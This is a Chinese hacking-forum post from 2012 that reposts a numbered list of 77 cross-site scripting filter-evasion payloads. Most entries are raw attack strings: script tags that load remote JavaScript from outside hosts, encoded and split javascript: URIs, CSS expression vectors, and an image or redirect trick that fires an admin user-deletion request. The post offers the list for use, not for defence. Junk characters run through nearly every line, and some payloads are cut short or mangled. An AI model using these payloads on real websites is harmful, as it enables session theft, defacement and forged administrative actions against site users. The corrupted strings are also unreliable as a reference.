貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。 _4 O0 c& O5 v* ~2 B& y
; o' c3 R) A2 z( v (1)普通的XSS JavaScript注入
2 z y$ d8 m2 G! T0 Q" { <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
% s6 _4 J. z( S
+ s" m4 n; V" B; _5 [/ ] (2)IMG标签XSS使用JavaScript命令" s5 F5 }; K$ |( C' ^- P
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* T& M/ P5 I) q" o L8 D* {
( K+ ]' z3 \. s (3)IMG标签无分号无引号, n( s- {0 ^) z; H% q
<IMG SRC=javascript:alert(‘XSS’)>
9 U/ `, K2 s- y, ^% ?2 O
' b. g2 b* C) M7 z/ X (4)IMG标签大小写不敏感% A4 W& ~* Z5 z0 _
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
4 ]- [5 {% W D- j
; Z X8 c* O9 A0 L" [( P (5)HTML编码(必须有分号)# S* x8 ` H. f& A3 e" }
<IMG SRC=javascript:alert(“XSS”)>
, g+ H; Z6 `8 x3 Q+ Y9 ?* i7 Z
- j. k6 @6 B5 R: m (6)修正缺陷IMG标签$ P1 D% E7 x3 P5 j4 v
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
7 c9 J; X/ V4 Q A+ i z" f! O W( y
(7)formCharCode标签(计算器)
' S! y% D% b! W w3 G0 `+ Y <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> y8 D6 w' i+ Q
& V8 S. l! Q/ z8 ? w; M
(8)UTF-8的Unicode编码(计算器)
: v. L5 i6 ^ t! i* Y1 l5 R3 |* Q <IMG SRC=jav..省略..S')>2 M1 l* J* T, Y2 Z# [2 `$ X
$ R1 K9 h; m2 O
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
. h+ O% p" y: g <IMG SRC=jav..省略..S')>
9 S& ~. m5 g+ |; W M, d2 i% O: H/ W/ V5 S A& d5 H, v& D! X; `& D
(10)十六进制编码也是没有分号(计算器)
. D6 c* l* g2 R! `! ~0 C5 h <IMG SRC=java..省略..XSS')>
7 t) X- p, n, R9 k/ u0 ^. @, h* [ u9 R: Y* y
(11)嵌入式标签,将Javascript分开2 O; J0 f0 n# l6 K! C0 [/ R0 o# O
<IMG SRC=”jav ascript:alert(‘XSS’);”>: {- v5 i8 _( v) K- h
6 v6 Y6 S; d |3 g (12)嵌入式编码标签,将Javascript分开- |) r1 @3 x: W; [7 K0 d) G: c
<IMG SRC=”jav ascript:alert(‘XSS’);”>
. `: L. P: d; N- i }9 t2 ~
/ W6 H) {: Z5 e0 n (13)嵌入式换行符( e$ h8 ~. x6 J
<IMG SRC=”jav ascript:alert(‘XSS’);”>% [8 T& B/ L) B
& c/ t$ A6 g+ k! o0 {7 u' Y
(14)嵌入式回车( B' b% \6 ^% W1 f% t0 t
<IMG SRC=”jav ascript:alert(‘XSS’);”>
& \. D& x- ] T- n+ u) W! O9 R
8 c2 y8 k# \! z6 A( {; K ?% a (15)嵌入式多行注入JavaScript,这是XSS极端的例子5 Y1 Y2 g+ f. [' y
<IMG SRC=”javascript:alert(‘XSS‘)”>/ d4 S/ z* f* R1 Y. c
/ S4 Z2 d! b0 A& [
(16)解决限制字符(要求同页面)
% G( W1 w3 y; G <script>z=’document.’</script>
8 P: |# e% b# _) S* w0 a <script>z=z+’write(“‘</script>
" M+ O; N2 O- K! S: ]# | <script>z=z+’<script’</script>
" V9 W4 C+ D5 J9 F <script>z=z+’ src=ht’</script>
4 [2 H. E7 G' ]2 ?$ Y& P' _; X <script>z=z+’tp://ww’</script>+ K7 `/ a- w7 F* ^
<script>z=z+’w.shell’</script>2 D4 u1 @8 K6 O1 O
<script>z=z+’.net/1.’</script>$ l6 k* C5 i1 [: Q
<script>z=z+’js></sc’</script>" ]. ` K; S! l3 i
<script>z=z+’ript>”)’</script>2 l) e: P S3 T3 F; ]
<script>eval_r(z)</script> `9 ]% C* U% e
2 w; N* c5 {4 n) R6 m/ m. @3 ]
(17)空字符
1 V0 b# Y0 |1 v& v" t. D perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
' l! d$ M- v9 d* ]+ w( S. g: |
: c2 Z( `& |( O9 i- v (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
: Z6 {: h/ a: u. e. I. G, j perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out, s( v$ @1 c6 A# p5 i4 _ O1 A
6 ?1 e4 i+ r! `4 h5 f (19)Spaces和meta前的IMG标签
& M+ m$ m. r, b% k1 e" r <IMG SRC=” � javascript:alert(‘XSS’);”>5 @ ~# Q/ Y* L7 s! l" A
# D; B3 a U- r% z7 y- F1 ?& M9 C (20)Non-alpha-non-digit XSS$ G# B, L7 k% \" X
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
' S' j* @9 F" R7 V+ u8 m% |0 B6 O }5 r6 R( O( D- v4 u h; m
(21)Non-alpha-non-digit XSS to 2
E, J& r5 J1 Z2 X$ a2 Y <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
8 B- \+ D( S' ^1 ~* S+ \: x N1 Y: N e6 U3 y
(22)Non-alpha-non-digit XSS to 3
3 N1 I. J% F5 x5 [! b7 _ <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>" y0 E$ h) h7 p
- ]2 S/ v( j* K- z (23)双开括号
- e: y' P8 F7 o" X. y C ? <<SCRIPT>alert(“XSS”);//<</SCRIPT>+ b- h5 L" a7 ?9 U$ y; B
6 t; b: d3 _* r% y2 v- J0 U. T
(24)无结束脚本标记(仅火狐等浏览器)7 t1 r1 O2 A' i' |2 t8 n, _
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>4 ]! k9 M3 }+ s
7 g: m1 A$ H! w3 l; Y& G (25)无结束脚本标记23 P: Y" d# e- H" ~8 k S
<SCRIPT SRC=//3w.org/XSS/xss.js>$ q2 B/ ^) Q' L3 u. M5 Q
+ N, W5 B0 ^- x5 ~
(26)半开的HTML/JavaScript XSS3 k. z4 S& _4 i' K9 _+ I$ q/ X
<IMG SRC=”javascript:alert(‘XSS’)”
2 X- r4 m8 s( m% H- o+ H6 F, h7 H) H0 p4 P1 X$ Y8 ~9 @6 ]0 K7 B
(27)双开角括号
8 U! [. s6 e# Z; G* n6 z, M <iframe src=http://3w.org/XSS.html <
$ M$ h3 g1 R+ K; {; o1 O
$ z& I' `$ R# g( v5 ^' W (28)无单引号 双引号 分号
, u! Z/ A$ |3 C( O' Y" k! M <SCRIPT>a=/XSS/
2 A5 k+ m- c/ w9 v alert(a.source)</SCRIPT>
- B- |; d1 @2 u4 ]( {/ k7 m
5 m. O* f9 i2 [/ A X2 } (29)换码过滤的JavaScript; F" N! ]4 y2 Z3 t
\”;alert(‘XSS’);//
$ T* w1 `5 O6 O0 M
; K" j% {1 i; \$ z5 } (30)结束Title标签# X# ^' d8 j0 F' L7 n
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT># [) |1 h3 s# L- K# n+ `& [- C0 `- T
9 T7 _, D7 K* b, X1 g: H
(31)Input Image9 Y, ~0 i" c+ S* F( Q# E( v7 c
<INPUT SRC=”javascript:alert(‘XSS’);”>* V# d* g/ k$ ~: V0 N0 i3 `0 ?
3 { R. P; O1 m# U5 a (32)BODY Image0 o+ Z& d. I- K! F6 w
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>' _( X2 [! M/ U# G" C
, S- @9 P1 G2 r% S5 A
(33)BODY标签. ?0 ~- _" T( C* e$ r* C0 Z+ x
<BODY(‘XSS’)>
# ~4 s; p1 V* V5 B( U4 Q$ T6 [+ x6 I8 Z0 @
(34)IMG Dynsrc# j2 g- S4 p q$ R5 e
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
+ i9 O4 e# P3 S# M$ J
! q/ ?9 [' e4 g9 M (35)IMG Lowsrc
. I" [# V5 `* a/ O <IMG LOWSRC=”javascript:alert(‘XSS’)”>6 C" x8 T6 T' R4 {: b/ g
; J7 x, M0 a: ?$ q1 O) d/ C+ @
(36)BGSOUND
+ W4 [7 D4 u. X. O& b0 Q7 ^ <BGSOUND SRC=”javascript:alert(‘XSS’);”>6 X5 b- s8 x+ I, k; F& {. \
: m6 M9 c2 _' F. S3 W (37)STYLE sheet
1 U% {: ^7 N. L: { <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
, c; x) d, y! W! R. }1 o1 m( P
3 s( L0 j! f/ I* n2 ^1 H0 W- G (38)远程样式表: q; i3 @0 [3 Z
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>2 D. g2 B6 n- K0 {& y; M' F
1 E4 `+ Q% d1 i5 @
(39)List-style-image(列表式)3 U9 P4 z# W: c9 _) G+ O
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
3 Y3 X+ Z% l5 b; j- A0 W
$ x% }) {3 g: E+ T# ^# Q (40)IMG VBscript
. T2 q) h) ~! A; r5 E) u1 p4 q" E <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS7 C g& L! i& M6 u) ^( _$ P- f. A
, _, w2 n1 N9 T! b1 J. y3 ?
(41)META链接url
6 C7 ?# _( y1 ]: v; D, X; O, T <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
/ `: X5 \6 b8 w/ Y, B5 I7 Z% n: I5 x! o& U5 l
(42)Iframe* q, N- W% N5 p2 P
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>* X3 N# u- ^; h Z+ Q0 Q) P
6 M8 J9 G5 W) m2 O (43)Frame/ Z" V8 M. d: ~. o( s4 A5 s
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
& @4 u' c# [9 P0 w. A. V- ~/ ?4 G4 l# o3 c1 `
(44)Table8 k `, s, M7 r y+ v
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
- w1 f' D" a/ [+ b, E1 j6 a5 _
k, g) J5 D+ ~* M (45)TD
3 `. x5 K% `, O# N7 L <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>) D: l) i; d: \$ g
3 H, k% w& p1 v3 | e# J# F
(46)DIV background-image7 ?$ O- P' S- |, }" _2 r9 L B
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
( h7 k) c$ G, C% a
: Z0 P( ]' H3 F+ U3 l# W# n1 k (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)% p+ Y7 l% K# e
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
* U/ W+ O6 A" g$ b7 N8 Y0 e0 D$ I# u8 ]0 K
(48)DIV expression7 C* A) R( w: V! i3 V# c7 n
<DIV STYLE=”width: expression_r(alert(‘XSS’));”># s! l3 U3 d( L8 s' W2 x
& S, a; d3 B' j% m- i7 [3 C
(49)STYLE属性分拆表达1 }9 l( K1 n9 `$ A
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
4 B6 K) T8 ]5 l9 m' d" O0 g1 O1 B5 w& _% ~7 d/ e3 V
(50)匿名STYLE(组成:开角号和一个字母开头)
6 U. y+ q9 |$ B1 W <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>5 K9 A5 f# R, o' t5 b4 d
$ o$ j$ M. Z* R; } (51)STYLE background-image$ N9 `8 I. \% N! J
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
- m7 ~) f$ K% a) T3 ^8 ~! l& m) D" ~2 J( I. q0 [' J4 J. f
(52)IMG STYLE方式' P, @# H G2 `5 K
exppression(alert(“XSS”))’>9 g. s% x; F* T0 Y I* q: E
) s! B. ]& T0 Y( ^
(53)STYLE background
! M+ ~* k+ z* `" ] <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
2 m0 B; N* S( M: I/ \$ A
3 W1 Z# a7 Y2 W$ a3 P" o (54)BASE
& U; F* x4 w- i0 T! F- V7 ]$ r6 H <BASE HREF=”javascript:alert(‘XSS’);//”>
" w+ c, E5 v5 _0 l- r
9 |& L7 J( d) Q& Q; x4 y! f (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
k) o7 D5 c5 e A! [3 H <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
& l* O/ N2 S/ K7 B1 {/ j* @+ ~1 v. k3 V3 e% l
(56)在flash中使用ActionScrpt可以混进你XSS的代码
- h3 A$ ?' J0 { a=”get”;! W: _1 n4 z4 [3 T
b=”URL(\”";
$ i. n6 h, f" P c=”javascript:”; h5 g$ M+ K# K! q4 y% a
d=”alert(‘XSS’);\”)”;
5 K: v$ L. Z7 D6 j+ h! V/ t eval_r(a+b+c+d);! S5 n; @5 B6 f3 { i" x! X( i. |; N
5 ?2 [; r$ D6 x+ e$ Y K (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
5 \# ^% s4 {- R9 J9 L- G [ <HTML xmlns:xss>
! Y- w% q6 j2 {9 w* V <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>- m% c: o" v% Y% K0 S( v6 t- J3 r
<xss:xss>XSS</xss:xss>, G" M( p8 l* o+ f6 g$ M6 M
</HTML>6 G# N2 J& o. V% F, p( ^0 k
9 t! v8 ~4 {5 y; ~% v# A* _4 D (58)如果过滤了你的JS你可以在图片里添加JS代码来利用: J$ u6 ?* d6 W; g7 r
<SCRIPT SRC=””></SCRIPT>
+ v( Z9 I- j2 Y6 Z# r
9 o5 V1 P0 p: t. J# o6 z& O (59)IMG嵌入式命令,可执行任意命令$ v% @9 B' T+ O2 w# ~
<IMG SRC=”http://www.XXX.com/a.php?a=b”># [9 T Z, P* O$ G& I
( v# |7 y7 C3 {$ G
(60)IMG嵌入式命令(a.jpg在同服务器)6 C3 h( Z, U2 B+ g$ G3 X$ f
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
# s6 J" u; h$ B2 Z% {( H1 A. s5 F, W+ N$ A0 B& U% ^: X6 _7 A
(61)绕符号过滤- T+ Z8 {2 `; [2 c. [& K
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>5 F/ A! J! `( b6 D1 b d
) d+ |: p4 P8 b8 {) d" t# b! q (62)( z5 u) T+ u7 k k% b3 i
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>/ l" Z# }! m" d* m8 X7 {" }2 q$ {
. q9 g; G: l0 [0 R (63)% H5 g' A, K& S9 Y
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
$ q- r9 H) @9 K# |2 ^# j( u7 g) P! V H: R% t4 s8 U
(64)
& ~8 n8 T& x& H) L' Z+ \: {" m <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>8 L3 w9 q. M0 s/ E* g4 U' ]: l
1 E: z# i7 u6 j8 A/ } (65)
, Y$ G- ^+ ^* o1 \ <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>3 o) |5 ?& { I; z0 f- Q, H( F) j
^1 B: _+ J0 D: `7 ?- R6 @
(66)
' q, G) i0 Y' H3 j/ w6 C <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>( [+ E' \- O7 u1 x1 Y
: B& V+ y% q o
(67)
8 T9 M& f9 Y8 e& f' w% Q: d) Z <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
% k: M9 y& D2 c4 @# e$ ?6 M* N8 m3 n& r/ s. C4 F
(68)URL绕行9 _0 x0 ^1 M) n( w5 r5 x2 W, u1 w$ C
<A HREF=”http://127.0.0.1/”>XSS</A>
+ O5 K! X: e G3 [- W: R
9 l) a* N. r6 h# n( S (69)URL编码
' k. r2 J& B/ P <A HREF=”http://3w.org”>XSS</A>: ]# z6 ~ b% [# u1 j
- R) R. b' H& E; R8 P$ f L (70)IP十进制& u1 n( ]4 w. U2 S2 M/ d
<A HREF=”http://3232235521″>XSS</A>
: G# R) j; ?2 W8 t7 S- R% h! e0 d
(71)IP十六进制
5 X& S- e% \+ t <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
" Z4 j1 W! d" C" K* M4 {
+ k/ v2 p3 [" i (72)IP八进制" ^# B: u* o' T) M" f9 B9 V
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
& \/ p0 y. @ ?9 s' r# j: ?- B. x8 w# @, }) s1 }
(73)混合编码- |3 F7 u# _# K Q$ Z Q3 l( F9 X
<A HREF=”h; j" E& k/ ^( I3 P: Q
tt p://6 6.000146.0×7.147/”">XSS</A>) q1 F9 H# ` F+ f% Z; o
5 u9 r# i1 o; r+ p, E4 [! m (74)节省[http:]
) l0 k$ U0 V5 U5 ?: ~2 C <A HREF=”//www.google.com/”>XSS</A>
: Y5 a0 u5 a0 V, Q
0 B1 d+ k4 S, b7 \/ ]. N4 }. { (75)节省[www]0 o) @1 c$ i5 L* i( B
<A HREF=”http://google.com/”>XSS</A>& x _6 U+ r3 }) }& S) j K# k
6 a$ G/ |& Y! E4 f% U. J! T9 s+ Z
(76)绝对点绝对DNS) D* {) y0 i! a
<A HREF=”http://www.google.com./”>XSS</A>% Z: o' y5 P2 W6 B7 x. y
% d: @/ |/ V- s5 Y9 M; R6 E" N (77)javascript链接
; Q" F$ u/ D V# {; y. s( Q& t <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对